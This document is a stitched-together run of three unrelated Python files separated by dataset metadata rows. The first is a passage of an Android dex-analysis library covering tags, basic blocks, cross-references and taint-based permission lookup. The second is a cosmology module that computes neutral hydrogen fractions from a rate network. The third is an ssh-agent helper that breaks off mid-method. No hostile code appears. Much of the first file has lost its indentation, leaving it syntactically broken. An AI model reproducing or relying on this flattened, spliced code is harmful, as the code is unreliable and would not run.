TAG_ANDROID.JAVA_REFLECTION : [ 0, "Ljava/lang/reflect"],
}
class Tags(object):
    """
    Handle specific tags
    :param patterns: a dict mapping a tag value to [pattern type, regexp string]
    :param reverse: a dict mapping a tag value back to its name
    """
    def __init__(self, patterns=TAGS_ANDROID, reverse=TAG_REVERSE_ANDROID):
        self.tags = set()
        self.patterns = patterns
        # Honour the caller-supplied reverse mapping (the old code always
        # used TAG_REVERSE_ANDROID, ignoring the argument).
        self.reverse = reverse
        for i in self.patterns:
            self.patterns[i][1] = re.compile(self.patterns[i][1])
def emit(self, method):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search( method.get_class() ) != None:
self.tags.add( i )
def emit_by_classname(self, classname):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search( classname ) != None:
self.tags.add( i )
def get_list(self):
return [ self.reverse[ i ] for i in self.tags ]
def __contains__(self, key):
return key in self.tags
def __str__(self):
return str([ self.reverse[ i ] for i in self.tags ])
def empty(self):
return self.tags == set()
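# Usage sketch for Tags (hypothetical class name): feed it class names and it
# accumulates the matching TAG_ANDROID categories (set order is arbitrary).
#
#   t = Tags()
#   t.emit_by_classname("Landroid/telephony/SmsManager;")
#   print t.get_list()   # e.g. ['ANDROID', 'TELEPHONY', 'SMS']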
class BasicBlocks(object):
"""
This class represents all basic blocks of a method
"""
def __init__(self, _vm, tv):
self.__vm = _vm
self.tainted = tv
self.bb = []
def push(self, bb):
self.bb.append(bb)
def pop(self, idx):
return self.bb.pop(idx)
def get_basic_block(self, idx):
for i in self.bb:
if idx >= i.get_start() and idx < i.get_end():
return i
return None
    def get_tainted_integers(self):
        try:
            return self.tainted.get_tainted_integers()
        except AttributeError:
            return None
    def get_tainted_packages(self):
        try:
            return self.tainted.get_tainted_packages()
        except AttributeError:
            return None
    def get_tainted_variables(self):
        try:
            return self.tainted.get_tainted_variables()
        except AttributeError:
            return None
def get(self):
"""
:rtype: return each basic block (:class:`DVMBasicBlock` object)
"""
for i in self.bb:
yield i
def gets(self):
"""
:rtype: a list of basic blocks (:class:`DVMBasicBlock` objects)
"""
return self.bb
def get_basic_block_pos(self, idx):
return self.bb[idx]
class ExceptionAnalysis(object):
def __init__(self, exception, bb):
self.start = exception[0]
self.end = exception[1]
self.exceptions = exception[2:]
for i in self.exceptions:
i.append(bb.get_basic_block(i[1]))
def show_buff(self):
buff = "%x:%x\n" % (self.start, self.end)
for i in self.exceptions:
if i[2] == None:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2])
else:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2].get_name())
return buff[:-1]
def get(self):
d = {"start": self.start, "end": self.end, "list": []}
for i in self.exceptions:
d["list"].append({"name": i[0], "idx": i[1], "bb": i[2].get_name()})
return d
class Exceptions(object):
def __init__(self, _vm):
self.__vm = _vm
self.exceptions = []
def add(self, exceptions, basic_blocks):
for i in exceptions:
self.exceptions.append( ExceptionAnalysis( i, basic_blocks ) )
def get_exception(self, addr_start, addr_end):
for i in self.exceptions:
# print hex(i.start), hex(i.end), hex(addr_start), hex(addr_end), i.start >= addr_start and i.end <= addr_end, addr_end <= i.end and addr_start >= i.start
if i.start >= addr_start and i.end <= addr_end:
return i
elif addr_end <= i.end and addr_start >= i.start:
return i
return None
def gets(self):
return self.exceptions
def get(self):
for i in self.exceptions:
yield i
BO = { "BasicOPCODES" : dvm.BRANCH_DVM_OPCODES, "BasicClass" : DVMBasicBlock, "Dnext" : dvm.determineNext, "Dexception" : dvm.determineException }
BO["BasicOPCODES_H"] = []
for i in BO["BasicOPCODES"]:
BO["BasicOPCODES_H"].append( re.compile( i ) )
class MethodAnalysis(object):
"""
This class analyses in details a method of a class/dex file
:param vm: the object which represent the dex file
:param method: the original method
:param tv: a virtual object to get access to tainted information
:type vm: a :class:`DalvikVMFormat` object
:type method: a :class:`EncodedMethod` object
"""
def __init__(self, vm, method, tv):
self.__vm = vm
self.method = method
self.tainted = tv
self.basic_blocks = BasicBlocks(self.__vm, self.tainted)
self.exceptions = Exceptions(self.__vm)
code = self.method.get_code()
if code == None:
return
current_basic = BO["BasicClass"](0, self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
##########################################################
bc = code.get_bc()
l = []
h = {}
idx = 0
debug("Parsing instructions")
instructions = [i for i in bc.get_instructions()]
for i in instructions:
for j in BO["BasicOPCODES_H"]:
if j.match(i.get_name()) != None:
v = BO["Dnext"](i, idx, self.method)
h[ idx ] = v
l.extend(v)
break
idx += i.get_length()
debug("Parsing exceptions")
excepts = BO["Dexception"]( self.__vm, self.method )
for i in excepts:
l.extend( [i[0]] )
for handler in i[2:]:
l.append( handler[1] )
debug("Creating basic blocks in %s" % self.method)
idx = 0
for i in instructions:
# index is a destination
if idx in l:
if current_basic.get_nb_instructions() != 0:
current_basic = BO["BasicClass"](current_basic.get_end(), self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
current_basic.push(i)
# index is a branch instruction
if idx in h:
current_basic = BO["BasicClass"]( current_basic.get_end(), self.__vm, self.method, self.basic_blocks )
self.basic_blocks.push( current_basic )
idx += i.get_length()
if current_basic.get_nb_instructions() == 0:
self.basic_blocks.pop(-1)
debug("Settings basic blocks childs")
for i in self.basic_blocks.get():
try:
i.set_childs( h[ i.end - i.get_last_length() ] )
except KeyError:
i.set_childs( [] )
debug("Creating exceptions")
# Create exceptions
self.exceptions.add(excepts, self.basic_blocks)
for i in self.basic_blocks.get():
# setup exception by basic block
i.set_exception_analysis(self.exceptions.get_exception( i.start, i.end - 1 ))
del instructions
del h, l
def get_basic_blocks(self):
"""
:rtype: a :class:`BasicBlocks` object
"""
return self.basic_blocks
    def get_length(self):
        """
        :rtype: an integer which is the length of the code
        """
        # MethodAnalysis has no get_code() of its own; fetch the code object
        # from the wrapped method.
        code = self.method.get_code()
        return code.get_length() if code else 0
def get_vm(self):
return self.__vm
def get_method(self):
return self.method
def get_local_variables(self):
return self.tainted.get_tainted_variables().get_local_variables( self.method )
def show(self):
print "METHOD", self.method.get_class_name(), self.method.get_name(), self.method.get_descriptor()
for i in self.basic_blocks.get():
print "\t", i
i.show()
print ""
    def show_methods(self):
        print "\t #METHODS :"
        # NOTE: this assumes blocks exposing get_methods() (BreakBlock-style);
        # DVMBasicBlock objects do not implement it.
        for i in self.basic_blocks.get():
            methods = i.get_methods()
            for method in methods:
                print "\t\t-->", method.get_class_name(), method.get_name(), method.get_descriptor()
                for context in methods[method]:
                    print "\t\t\t |---|", context.details
def create_tags(self):
"""
Create the tags for the method
"""
self.tags = Tags()
for i in self.tainted.get_tainted_packages().get_packages_by_method( self.method ):
self.tags.emit_by_classname( i )
def get_tags(self):
"""
Return the tags of the method
:rtype: a :class:`Tags` object
"""
return self.tags
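# Usage sketch (assumes `x` is a MethodAnalysis built by VMAnalysis below):
# walk the control-flow graph one basic block at a time; get_next() yields
# (src_idx, dst_idx, block) tuples.
#
#   for bb in x.get_basic_blocks().get():
#       print bb.get_name(), [child[2].get_name() for child in bb.get_next()]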
SIGNATURE_L0_0 = "L0_0"
SIGNATURE_L0_1 = "L0_1"
SIGNATURE_L0_2 = "L0_2"
SIGNATURE_L0_3 = "L0_3"
SIGNATURE_L0_4 = "L0_4"
SIGNATURE_L0_5 = "L0_5"
SIGNATURE_L0_6 = "L0_6"
SIGNATURE_L0_0_L1 = "L0_0:L1"
SIGNATURE_L0_1_L1 = "L0_1:L1"
SIGNATURE_L0_2_L1 = "L0_2:L1"
SIGNATURE_L0_3_L1 = "L0_3:L1"
SIGNATURE_L0_4_L1 = "L0_4:L1"
SIGNATURE_L0_5_L1 = "L0_5:L1"
SIGNATURE_L0_0_L2 = "L0_0:L2"
SIGNATURE_L0_0_L3 = "L0_0:L3"
SIGNATURE_HEX = "hex"
SIGNATURE_SEQUENCE_BB = "sequencebb"
SIGNATURES = {
SIGNATURE_L0_0 : { "type" : 0 },
SIGNATURE_L0_1 : { "type" : 1 },
SIGNATURE_L0_2 : { "type" : 2, "arguments" : ["Landroid"] },
SIGNATURE_L0_3 : { "type" : 2, "arguments" : ["Ljava"] },
SIGNATURE_L0_4 : { "type" : 2, "arguments" : ["Landroid", "Ljava"] },
SIGNATURE_L0_5 : { "type" : 3, "arguments" : ["Landroid"] },
SIGNATURE_L0_6 : { "type" : 3, "arguments" : ["Ljava"] },
SIGNATURE_SEQUENCE_BB : {},
SIGNATURE_HEX : {},
}
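# Sketch: a predefined signature string for VMAnalysis.get_method_signature()
# below is colon-separated; entries containing an underscore select one of
# the SIGNATURES presets above, other entries are passed through verbatim.
#
#   predef = SIGNATURE_L0_4 + ":" + SIGNATURE_SEQUENCE_BB   # "L0_4:sequencebb"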
from sign import Signature
class StringAnalysis(object):
def __init__(self, value):
self.value = value
self.xreffrom = set()
def AddXrefFrom(self, classobj, methodobj):
#debug("Added strings xreffrom for %s to %s" % (self.value, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def __str__(self):
data = "XREFto for string %s in\n" % repr(self.value)
for ref_class, ref_method in self.xreffrom:
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
class MethodClassAnalysis(object):
def __init__(self, method):
self.method = method
self.xrefto = set()
self.xreffrom = set()
def AddXrefTo(self, classobj, methodobj):
#debug("Added method xrefto for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xrefto.add((classobj, methodobj))
def AddXrefFrom(self, classobj, methodobj):
#debug("Added method xreffrom for %s [%s] to %s" % (self.method, classobj, methodobj))
self.xreffrom.add((classobj, methodobj))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def __str__(self):
data = "XREFto for %s\n" % self.method
for ref_class, ref_method in self.xrefto:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
data += "XREFFrom for %s\n" % self.method
for ref_class, ref_method in self.xreffrom:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
class FieldClassAnalysis(object):
def __init__(self, field):
self.field = field
self.xrefread = set()
self.xrefwrite = set()
    def AddXrefRead(self, classobj, methodobj):
        #debug("Added field xrefread for %s [%s] to %s" % (self.field, classobj, methodobj))
        self.xrefread.add((classobj, methodobj))
    def AddXrefWrite(self, classobj, methodobj):
        #debug("Added field xrefwrite for %s [%s] to %s" % (self.field, classobj, methodobj))
        self.xrefwrite.add((classobj, methodobj))
def get_xref_read(self):
return self.xrefread
def get_xref_write(self):
return self.xrefwrite
def __str__(self):
data = "XREFRead for %s\n" % self.field
for ref_class, ref_method in self.xrefread:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
data += "XREFWrite for %s\n" % self.field
for ref_class, ref_method in self.xrefwrite:
data += "in\n"
data += "%s:%s\n" % (ref_class.get_vm_class().get_name(), ref_method)
return data
REF_NEW_INSTANCE = 0
REF_CLASS_USAGE = 1
class ClassAnalysis(object):
def __init__(self, classobj):
self._class = classobj
self._methods = {}
self._fields = {}
self.xrefto = collections.defaultdict(set)
self.xreffrom = collections.defaultdict(set)
def get_method_analysis(self, method):
return self._methods.get(method)
def get_field_analysis(self, field):
return self._fields.get(field)
def AddFXrefRead(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefRead(classobj, method)
def AddFXrefWrite(self, method, classobj, field):
if field not in self._fields:
self._fields[field] = FieldClassAnalysis(field)
self._fields[field].AddXrefWrite(classobj, method)
def AddMXrefTo(self, method1, classobj, method2):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefTo(classobj, method2)
def AddMXrefFrom(self, method1, classobj, method2):
if method1 not in self._methods:
self._methods[method1] = MethodClassAnalysis(method1)
self._methods[method1].AddXrefFrom(classobj, method2)
def AddXrefTo(self, ref_kind, classobj, methodobj):
#debug("Added class xrefto for %s to %s" % (self._class.get_name(), classobj.get_vm_class().get_name()))
self.xrefto[classobj].add((ref_kind, methodobj))
def AddXrefFrom(self, ref_kind, classobj, methodobj):
#debug("Added class xreffrom for %s to %s" % (self._class.get_name(), classobj.get_vm_class().get_name()))
self.xreffrom[classobj].add((ref_kind, methodobj))
def get_xref_from(self):
return self.xreffrom
def get_xref_to(self):
return self.xrefto
def get_vm_class(self):
return self._class
def __str__(self):
data = "XREFto for %s\n" % self._class
for ref_class in self.xrefto:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method in self.xrefto[ref_class]:
data += "%d %s\n" % (ref_kind, ref_method)
data += "\n"
data += "XREFFrom for %s\n" % self._class
for ref_class in self.xreffrom:
data += str(ref_class.get_vm_class().get_name()) + " "
data += "in\n"
for ref_kind, ref_method in self.xreffrom[ref_class]:
data += "%d %s\n" % (ref_kind, ref_method)
data += "\n"
return data
class newVMAnalysis(object):
def __init__(self, vm):
self.vm = vm
self.classes = {}
self.strings = {}
for current_class in self.vm.get_classes():
self.classes[current_class.get_name()] = ClassAnalysis(current_class)
def create_xref(self):
debug("Creating XREF/DREF")
instances_class_name = self.classes.keys()
external_instances = {}
for current_class in self.vm.get_classes():
for current_method in current_class.get_methods():
debug("Creating XREF for %s" % current_method)
code = current_method.get_code()
if code == None:
continue
off = 0
bc = code.get_bc()
for instruction in bc.get_instructions():
op_value = instruction.get_op_value()
if op_value in [0x1c, 0x22]:
idx_type = instruction.get_ref_kind()
type_info = self.vm.get_cm_type(idx_type)
# Internal xref related to class manipulation
if type_info in instances_class_name and type_info != current_class.get_name():
# new instance
if op_value == 0x22:
self.classes[current_class.get_name()].AddXrefTo(REF_NEW_INSTANCE, self.classes[type_info], current_method)
self.classes[type_info].AddXrefFrom(REF_NEW_INSTANCE, self.classes[current_class.get_name()], current_method)
# class reference
else:
self.classes[current_class.get_name()].AddXrefTo(REF_CLASS_USAGE, self.classes[type_info], current_method)
self.classes[type_info].AddXrefFrom(REF_CLASS_USAGE, self.classes[current_class.get_name()], current_method)
elif ((op_value >= 0x6e and op_value <= 0x72) or
(op_value >= 0x74 and op_value <= 0x78)):
idx_meth = instruction.get_ref_kind()
method_info = self.vm.get_cm_method(idx_meth)
if method_info:
class_info = method_info[0]
method_item = self.vm.get_method_descriptor(method_info[0], method_info[1], ''.join(method_info[2]))
if method_item:
self.classes[current_class.get_name()].AddMXrefTo(current_method, self.classes[class_info], method_item)
self.classes[class_info].AddMXrefFrom(method_item, self.classes[current_class.get_name()], current_method)
# Internal xref related to class manipulation
if class_info in instances_class_name and class_info != current_class.get_name():
self.classes[current_class.get_name()].AddXrefTo(REF_CLASS_USAGE, self.classes[class_info], method_item)
self.classes[class_info].AddXrefFrom(REF_CLASS_USAGE, self.classes[current_class.get_name()], current_method)
elif op_value >= 0x1a and op_value <= 0x1b:
string_value = self.vm.get_cm_string(instruction.get_ref_kind())
if string_value not in self.strings:
self.strings[string_value] = StringAnalysis(string_value)
self.strings[string_value].AddXrefFrom(self.classes[current_class.get_name()], current_method)
elif op_value >= 0x52 and op_value <= 0x6d:
idx_field = instruction.get_ref_kind()
field_info = self.vm.get_cm_field(idx_field)
field_item = self.vm.get_field_descriptor(field_info[0], field_info[2], field_info[1])
if field_item:
# read access to a field
if (op_value >= 0x52 and op_value <= 0x58) or (op_value >= 0x60 and op_value <= 0x66):
self.classes[current_class.get_name()].AddFXrefRead(current_method, self.classes[current_class.get_name()], field_item)
# write access to a field
else:
self.classes[current_class.get_name()].AddFXrefWrite(current_method, self.classes[current_class.get_name()], field_item)
off += instruction.get_length()
def get_method(self, method):
return MethodAnalysis( self.vm, method, None )
    def get_method_by_name(self, class_name, method_name, method_descriptor):
        if class_name in self.classes:
            for method in self.classes[class_name].get_vm_class().get_methods():
                if method.get_name() == method_name and method.get_descriptor() == method_descriptor:
                    return method
        return None
def is_class_present(self, class_name):
return class_name in self.classes
def get_class_analysis(self, class_name):
return self.classes.get(class_name)
def get_strings_analysis(self):
return self.strings
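# Usage sketch for the xref-based analysis (hypothetical names; `d` is a
# DalvikVMFormat object):
#
#   nx = newVMAnalysis(d)
#   nx.create_xref()
#   ca = nx.get_class_analysis("Lcom/example/Foo;")
#   if ca is not None:
#       print ca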
class VMAnalysis(object):
"""
This class analyses a dex file
:param _vm: the object which represent the dex file
:type _vm: a :class:`DalvikVMFormat` object
:Example:
VMAnalysis( DalvikVMFormat( read("toto.dex", binary=False) ) )
"""
def __init__(self, vm):
self.vm = vm
self.tainted_variables = TaintedVariables( self.vm )
self.tainted_packages = TaintedPackages( self.vm )
self.tainted = { "variables" : self.tainted_variables,
"packages" : self.tainted_packages,
}
self.signature = None
for i in self.vm.get_all_fields():
self.tainted_variables.add( [ i.get_class_name(), i.get_descriptor(), i.get_name() ], TAINTED_FIELD )
self.methods = []
self.hmethods = {}
self.__nmethods = {}
for i in self.vm.get_methods():
x = MethodAnalysis( self.vm, i, self )
self.methods.append( x )
self.hmethods[ i ] = x
self.__nmethods[ i.get_name() ] = x
def get_vm(self):
return self.vm
def get_method(self, method):
"""
Return an analysis method
:param method: a classical method object
:type method: an :class:`EncodedMethod` object
:rtype: a :class:`MethodAnalysis` object
"""
return self.hmethods[ method ]
def get_methods(self):
"""
Return each analysis method
        :rtype: an iterator over :class:`MethodAnalysis` objects
"""
for i in self.hmethods:
yield self.hmethods[i]
def get_method_signature(self, method, grammar_type="", options={}, predef_sign=""):
"""
Return a specific signature for a specific method
:param method: a reference to method from a vm class
:type method: a :class:`EncodedMethod` object
:param grammar_type: the type of the signature (optional)
:type grammar_type: string
:param options: the options of the signature (optional)
:param options: dict
:param predef_sign: used a predefined signature (optional)
:type predef_sign: string
:rtype: a :class:`Sign` object
"""
if self.signature == None:
self.signature = Signature( self )
if predef_sign != "":
g = ""
o = {}
for i in predef_sign.split(":"):
if "_" in i:
g += "L0:"
o[ "L0" ] = SIGNATURES[ i ]
else:
g += i
g += ":"
return self.signature.get_method( self.get_method( method ), g[:-1], o )
else:
return self.signature.get_method( self.get_method( method ), grammar_type, options )
def get_permissions(self, permissions_needed):
"""
Return the permissions used
:param permissions_needed: a list of restricted permissions to get ([] returns all permissions)
:type permissions_needed: list
        :rtype: a dictionary of permissions paths
"""
permissions = {}
permissions.update( self.get_tainted_packages().get_permissions( permissions_needed ) )
permissions.update( self.get_tainted_variables().get_permissions( permissions_needed ) )
return permissions
def get_permissions_method(self, method):
permissions_f = self.get_tainted_packages().get_permissions_method( method )
permissions_v = self.get_tainted_variables().get_permissions_method( method )
all_permissions_of_method = permissions_f.union(permissions_v)
return list(all_permissions_of_method)
def get_tainted_variables(self):
"""
Return the tainted variables
:rtype: a :class:`TaintedVariables` object
"""
return self.tainted_variables
def get_tainted_packages(self):
"""
Return the tainted packages
:rtype: a :class:`TaintedPackages` object
"""
return self.tainted_packages
def get_tainted_fields(self):
return self.get_tainted_variables().get_fields()
def get_tainted_field(self, class_name, name, descriptor):
"""
Return a specific tainted field
:param class_name: the name of the class
:param name: the name of the field
:param descriptor: the descriptor of the field
:type class_name: string
:type name: string
:type descriptor: string
:rtype: a :class:`TaintedVariable` object
"""
return self.get_tainted_variables().get_field( class_name, name, descriptor )
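# End-to-end sketch, mirroring the :Example: in the docstring above (`read`
# is assumed to be androguard's file helper):
#
#   d = dvm.DalvikVMFormat( read("classes.dex", binary=False) )
#   dx = VMAnalysis(d)
#   print dx.get_permissions([])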
class uVMAnalysis(VMAnalysis):
"""
    This class analyses a dex file on the fly (quicker!)
:param _vm: the object which represent the dex file
:type _vm: a :class:`DalvikVMFormat` object
:Example:
uVMAnalysis( DalvikVMFormat( read("toto.dex", binary=False) ) )
"""
def __init__(self, vm):
self.vm = vm
self.tainted_variables = TaintedVariables( self.vm )
self.tainted_packages = TaintedPackages( self.vm )
self.tainted = { "variables" : self.tainted_variables,
"packages" : self.tainted_packages,
}
self.signature = None
self.resolve = False
def get_methods(self):
self.resolve = True
for i in self.vm.get_methods():
yield MethodAnalysis(self.vm, i, self)
def get_method(self, method):
return MethodAnalysis( self.vm, method, None )
def get_vm(self):
return self.vm
    def _resolve(self):
        if not self.resolve:
            for i in self.get_methods():
                pass
def get_tainted_packages(self):
self._resolve()
return self.tainted_packages
def get_tainted_variables(self):
self._resolve()
return self.tainted_variables
def is_ascii_obfuscation(vm):
for classe in vm.get_classes():
if is_ascii_problem(classe.get_name()):
return True
for method in classe.get_methods():
if is_ascii_problem(method.get_name()):
return True
return False
| apache-2.0 | -7,692,190,307,748,464,000 | 33.142098 | 169 | 0.524759 | false | 3.785638 | false | false | false |
sbird/fake_spectra | fake_spectra/ratenetworkspectra.py | 1 | 6626 | """Modified versions of gas properties and spectra that use the rate network."""
import numpy as np
from ._spectra_priv import _interpolate_2d
from . import gas_properties
from . import spectra
from .rate_network import RateNetwork
class RateNetworkGas(gas_properties.GasProperties):
"""Replace the get_reproc_HI function with something that solves the rate network. Optionally can also do self-shielding."""
def __init__(self, redshift, absnap, hubble=0.71, fbar=0.17, units=None, sf_neutral=True, temp_factor=1, gamma_factor=1, **kwargs):
super().__init__(redshift, absnap, hubble=hubble, fbar=fbar, units=units, sf_neutral=sf_neutral)
self.rates = RateNetwork(redshift, f_bar = fbar, **kwargs)
self.temp_factor = temp_factor
self.gamma_factor = gamma_factor
self.maxdens = self.PhysDensThresh/0.76
dmax = 5
dsz=1000
if self.sf_neutral:
dmax = np.log(self.maxdens)
dsz = 500
self.build_interp(dlim=(-16, dmax), elim=(2, 21),tsz=500, dsz=dsz)
def build_interp(self, dlim, elim, tsz=500, dsz=1000):
"""Build the interpolator"""
#Build interpolation
self.densgrid = np.linspace(dlim[0], dlim[1], dsz)
self.ienergygrid = np.linspace(elim[0], elim[1], tsz)
dgrid, egrid = np.meshgrid(self.densgrid, self.ienergygrid)
self.lh0grid = np.zeros_like(dgrid)
self.tempgrid = np.zeros_like(dgrid)
#We assume primordial helium
for i in range(dsz):
self.lh0grid[:,i] = np.log(self.rates.get_neutral_fraction(np.exp(dgrid[:,i]), np.exp(egrid[:,i])))
self.tempgrid[:,i] = np.log(self.rates.get_temp(np.exp(dgrid[:,i]), np.exp(egrid[:,i])))
def get_temp(self,part_type, segment):
"""Compute temperature (in K) from internal energy using the rate network."""
temp, ii2, density, ienergy = self._get_interp(part_type, segment, nhi=False)
if np.size(ii2) > 0:
temp[ii2] = self.rates.get_temp(density[ii2], ienergy[ii2])
assert np.all(np.logical_not(np.isnan(temp)))
return temp
def _get_interp(self, part_type, segment, nhi=True):
"""Get a neutral hydrogen fraction using a rate network which reads temperature and density of the gas."""
#expecting units of atoms/cm^3
density = self.get_code_rhoH(part_type, segment)
#expecting units of 10^-10 ergs/g
ienergy = self.absnap.get_data(part_type, "InternalEnergy", segment=segment)*self.units.UnitInternalEnergy_in_cgs/1e10
ienergy = self._get_ienergy_rescaled(density, ienergy)
ldensity = np.log(density)
lienergy = np.log(ienergy)
#Clamp the temperatures : hot gas has the same neutral fraction of 0 anyway.
ie = np.where(lienergy >= np.max(self.ienergygrid))
lienergy[ie] = np.max(self.ienergygrid)*0.99
ie = np.where(lienergy <= np.min(self.ienergygrid))
lienergy[ie] = np.min(self.ienergygrid)*1.01
out = np.ones_like(density)
ii = np.where(ldensity < np.max(self.densgrid))
if (np.max(self.ienergygrid) < np.max(lienergy[ii])) or (np.min(self.ienergygrid) > np.min(lienergy[ii])):
raise ValueError("Ienergy out of range: interp %g -> %g. Present: %g -> %g" % (np.min(self.ienergygrid), np.max(self.ienergygrid), np.min(lienergy[ii]), np.max(lienergy[ii])))
#Correct internal energy to the internal energy of a cold cloud if we are on the star forming equation of state.
if nhi:
zgrid = self.lh0grid
else:
zgrid = self.tempgrid
out[ii] = np.exp(_interpolate_2d(ldensity[ii], lienergy[ii], self.densgrid, self.ienergygrid, zgrid))
ii2 = np.where(ldensity >= np.max(self.densgrid))
return out,ii2,density,ienergy
def get_reproc_HI(self, part_type, segment):
"""Get a neutral hydrogen fraction using a rate network which reads temperature and density of the gas."""
#expecting units of atoms/cm^3
nH0, ii2, density, ienergy = self._get_interp(part_type, segment, nhi=True)
if np.size(ii2) > 0:
if self.sf_neutral:
if self.redshift_coverage:
ssnH0 = self._neutral_fraction(density[ii2], 1e4)
nH0[ii2] = ssnH0
else:
nH0[ii2] = 1.
else:
nH0[ii2] = self.rates.get_neutral_fraction(density[ii2], ienergy[ii2])
assert np.all(np.logical_not(np.isnan(nH0)))
return nH0
def _get_ienergy_rescaled(self, density, ienergy):
"""Get the internal energy, rescaled to give the desired equation of state.
Technically the e. of s. normally used is:
T = T_0 (rho / rho_0)^(gamma-1)
However in photoionisation equilibrium the electron density depends very weakly
on the temperature, and so T/T_0 = U/U_0
So we can just rescale the internal energy:
when T_0 -> T_0' U -> U * T_0'/T_0.
Ditto for gamma, when gamma -> gamma' we have:
U -> U (rho/rho_0) ^(gamma'-gamma)
Note this means that if any particle lies off the original equation of state,
it lies off the new one by a similar amount; the dispersion is preserved!
"""
#Adjust temperature by desired factor, to give desired equation of state.
omegab = 0.0445
rhoc = self.units.rho_crit(self.hubble) * (1+self.redshift)**3
overden = self.units.protonmass * density /(omegab * rhoc)
ienergy *= self.temp_factor
#Adjust slope by same factor: note use gamma_factor -1 so gamma_factor = 1 means no change.
if self.gamma_factor != 1.:
ienergy *= (overden)**(self.gamma_factor-1.)
assert np.all(np.logical_not(np.isnan(ienergy)))
assert np.all(ienergy > 0)
return ienergy
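# Worked sketch of the rescaling in _get_ienergy_rescaled above (illustrative
# numbers only; not part of the module's API):
#
#   ienergy = 1.0; overden = 10.0
#   ienergy *= 2.0                     # temp_factor = 2 doubles U, hence T
#   ienergy *= overden ** (1.5 - 1.0)  # gamma_factor = 1.5 -> ~3.16x boost at overdensity 10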
class RateNetworkSpectra(spectra.Spectra):
"""Generate spectra with a neutral fraction from a rate network"""
def __init__(self, *args, photo_factor = 1, sf_neutral=True,
selfshield=True, temp_factor = 1, gamma_factor = 1,
hubble = 0.71, fbar = 0.17,
treecool_file = "data/TREECOOL_ep_2018p", **kwargs):
kwargs["gasprop"]=RateNetworkGas
kwargs["sf_neutral"] = sf_neutral
kwargs["gasprop_args"] = {"photo_factor" : photo_factor,
"selfshield" : selfshield, "temp_factor" : temp_factor,
"gamma_factor" : gamma_factor, "hubble" : hubble,
"fbar" : fbar, "treecool_file" : treecool_file}
super().__init__(*args, **kwargs)
| mit | -4,436,049,052,491,339,000 | 49.969231 | 187 | 0.623453 | false | 3.270484 | false | false | false |
drewandersonnz/openshift-tools | ansible/roles/lib_git/library/git_checkout.py | 12 | 13883 | #!/usr/bin/env python
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
"""Run an ssh agent and set SSH_AUTH_SOCK so that clients will use it
Example:
with ssh_agent.SshAgent() as agent:
agent.add_key(private_key_string)
# do ssh stuff
# as agent loses scope, the ssh agent is killed
"""
from __future__ import with_statement
import atexit
import tempfile
import os
import sys
import shutil
import subprocess
import random
import time
import datetime
class SshAgentException(Exception):
"""An exception thrown for problems in SshAgent
"""
def __init__(self, message):
# Call the base class constructor with the parameters it needs
super(SshAgentException, self).__init__(message)
class SshAgent(object):
"""Run an ssh agent and set SSH_AUTH_SOCK so that clients will use it.
The running agent can have one or more keys added (via the SshAgent.add_key()
method or via any other method that can find and talk to the running agent.
"""
class Cleanup(object):
"""A helper functor class for SshAgent
An object of this class can be passed
directly to atexit, which will call __call__() when the
program exits
"""
def __init__(self, ssh_agent, ssh_auth_sock_dir):
self.ssh_agent = ssh_agent
self.ssh_auth_sock_dir = ssh_auth_sock_dir
self.cleaned_up = False
self.original_env_var = os.environ.get('SSH_AUTH_SOCK')
def __call__(self):
if self.cleaned_up:
return
self.cleaned_up = True
try:
shutil.rmtree(self.ssh_auth_sock_dir, ignore_errors=True)
except OSError:
pass
try:
self.ssh_agent.kill()
except OSError:
pass
if self.original_env_var:
os.environ['SSH_AUTH_SOCK'] = self.original_env_var
else:
del os.environ['SSH_AUTH_SOCK']
def pass_(self):
"""A function to appease pylint"""
pass
def pass__(self):
"""Another function to appease pylint"""
self.pass_()
def __init__(self):
devnull = open(os.devnull, 'w')
# Start an ssh-agent process and register it to be killed atexit
self.ssh_auth_sock_dir = tempfile.mkdtemp(prefix=os.path.basename(sys.argv[0]) + '.')
self.ssh_auth_sock = os.path.join(self.ssh_auth_sock_dir, "ssh_agent")
self.ssh_agent = subprocess.Popen(["ssh-agent", "-d", "-a", self.ssh_auth_sock], stdout=devnull, stderr=devnull)
self.cleanup = self.Cleanup(self.ssh_agent, self.ssh_auth_sock_dir)
# this is here so that when python exits, we make sure that the agent is killed
# (in case python exits before our __del__() is called
atexit.register(self.cleanup)
os.environ["SSH_AUTH_SOCK"] = self.ssh_auth_sock
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tback):
self.cleanup()
def __del__(self):
self.cleanup()
def kill(self):
'''Explicitly kill the running ssh-agent
It's not necessary to call this function as the agent
will be cleaned up automatically.
'''
self.cleanup()
def add_key(self, key):
"""Add a key to the running agent.
Note:
This function can be called any number of times to add multiple keys.
Args:
key (str): A string containing the ssh private key to be added (the
actual key data, not the filename of a key)
Raises:
SshAgentException: when ssh-add does not immediately return (as in the
case of a private key with a passphrase)
"""
#if self.ssh_agent.poll() is None:
# raise SshAgentException("Unable to add ssh key. Did agent die?")
